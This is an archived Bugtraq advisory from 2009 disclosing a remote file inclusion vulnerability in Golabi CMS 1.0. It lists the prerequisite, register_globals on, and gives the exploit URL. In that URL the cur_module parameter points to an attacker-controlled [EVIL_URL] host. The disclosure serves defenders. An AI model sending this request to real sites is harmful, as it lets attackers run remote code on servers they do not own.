Golabi CMS Remote File Inclusion Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Golabi CMS Remote File Inclusion Vulnerability
From: rezazahfaran@xxxxxxxxx
Date: Thu, 26 Feb 2009 00:26:47 -0700
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

--------------------------------------------------------------------------------
                 [wWw.CrazyAngel.iR]  -   [info-AT-CrazyAngel.iR]
--------------------------------------------------------------------------------

               [Golabi CMS Remote File Inclusion Vulnerability]

[+] Application Info:
    [*] Name:       Golabi CMS
    [*] Author:     R3dM0ve
    [*] HomePage:   http://golabicms.sourceforge.net/
    [*] Download:   
http://downloads.sourceforge.net/golabicms/Golabi_1.0.zip?use_mirror=freefr

[+] Vulnerability Info:
    [*] Type:  Remote File Inclusion (RFI)
    [*] Requirement: register_globals [ON]
    [*] Risk:  High Critical
    [*] Bug Hunter: CrazyAngel
    [*] Details: Unhandled variable Inclusion in default template file results 
in RFI Vulnerability
    [*] Vul URL: 
[GOLABI_PATH]/templates/default/index_logged.php?main_loaded=1&cur_module=[EVIL_URL]




--------------------------------------------------------------------------------

Prev by Date: Sopcast SopCore Control (sopocx.ocx 3.0.3.501) SetExternalPlayer() user assisted remote code execution poc
Next by Date: [SECURITY] [DSA 1727-1] New proftpd-dfsg packages fix SQL injection vulnerabilites
Previous by thread: Sopcast SopCore Control (sopocx.ocx 3.0.3.501) SetExternalPlayer() user assisted remote code execution poc
Next by thread: [SECURITY] [DSA 1727-1] New proftpd-dfsg packages fix SQL injection vulnerabilites
Index(es):
- Date
- Thread